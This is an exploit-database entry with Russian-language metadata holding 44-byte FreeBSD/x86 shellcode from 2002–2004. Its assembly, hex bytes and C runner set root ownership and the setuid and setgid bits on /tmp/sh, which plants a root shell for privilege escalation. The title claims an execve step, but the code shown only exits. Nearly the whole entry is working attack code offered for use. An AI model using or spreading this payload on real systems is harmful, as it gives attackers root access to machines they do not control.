Exploit FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)

[Exploiter]

EDB-ID

13276

Проверка EDB

1. Пройдено

Автор

CLAES M. NYBERG

Тип уязвимости

SHELLCODE

Платформа

FREEBSD_X86

CVE

N/A

Дата публикации

2004-09-26

/*
 * FreeBSD shellcode
 * chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755);
 * 44 bytes
 * 
 * Claes M. Nyberg 20020209
 *
 * <[email protected]>, <[email protected]>
 */

/*************************************************************
void
main(void)
{
__asm__("
          xor      %eax, %eax      # eax = 0 
          pushl    %eax            # string ends with NULL 
          pushl    $0x68732f2f     # push 'hs//' (//sh) 
          pushl    $0x706d742f     # push 'pmt/' (/tmp) 
          movl     %esp, %ebx      # ebx = &string[0]  
          push     %eax            # 0 
          push     %eax            # 0 
          push     %ebx            # /tmp/sh 
          push     %eax            # Dummy 
          mov      $0x10, %al      # eax = 16 = chown 
          int      $0x80           # chown(/tmp/sh, 0, 0); 
          xor      %eax, %eax      # eax = 0
          or       $0xded, %ax     # eax = 06755
          pushl    %eax            # 06755 
          push     %ebx            # /tmp/sh 
          pushl    %eax            # dummy 
          xor      %eax, %eax      # eax = 0
          mov      $0xf, %al       # eax = 15 = chmod 
          int      $0x80           # chmod(/tmp/sh, 06755); 
          mov      $0x1, %al       # eax = 1 = exit
		  push     %eax            # exit value = 1
          push     %eax            # Dummy
          int      $0x80           # exit(1);
    ");
}

*************************************************************/

#include <stdio.h>
#include <string.h>

static char freebsd_code[] =
		"\x31\xc0"              /* xor      %eax, %eax  */
		"\x50"                  /* pushl    %eax        */
		"\x68\x2f\x2f\x73\x68"  /* pushl    $0x68732f2f */
		"\x68\x2f\x74\x6d\x70"  /* pushl    $0x706d742f */
		"\x89\xe3"              /* movl     %esp, %ebx  */
		"\x50"                  /* pushl    %eax        */
		"\x50"                  /* pushl    %eax        */
		"\x53"                  /* pushl    %ebx        */
		"\x50"                  /* pushl    %eax        */
		"\xb0\x10"              /* mov      $0x10, %al  */
		"\xcd\x80"              /* int      $0x80       */
		"\x31\xc0"              /* xor      %eax, %eax  */
		"\x66\x0d\xed\x0d"      /* or       $0xded, %ax */
		"\x50"                  /* pushl    %eax        */
		"\x53"                  /* push     %ebx        */
		"\x50"                  /* pushl    %eax        */
		"\x31\xc0"              /* xor      %eax, %eax  */
		"\xb0\x0f"              /* mov      $0xf, %al   */
		"\xcd\x80"              /* int      $0x80       */
        "\xb0\x01"              /* mov      $0x1, %al   */
        "\x50"                  /* push     %eax        */
        "\x50"                  /* push     %eax        */
        "\xcd\x80";             /* int      $0x80       */

static char _freebsd_code[] =
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
        "\x68\x2f\x74\x6d\x70\x89\xe3\x50"
        "\x50\x53\x50\xb0\x10\xcd\x80\x31"
        "\xc0\x66\x0d\xed\x0d\x50\x53\x50"
        "\x31\xc0\xb0\x0f\xcd\x80\xb0\x01"
        "\x50\x50\xcd\x80";

void
main(void)
{
    void (*code)() = (void *)_freebsd_code;
    printf("strlen code: %d\n", strlen(freebsd_code));
    code();
}

// milw0rm.com [2004-09-26]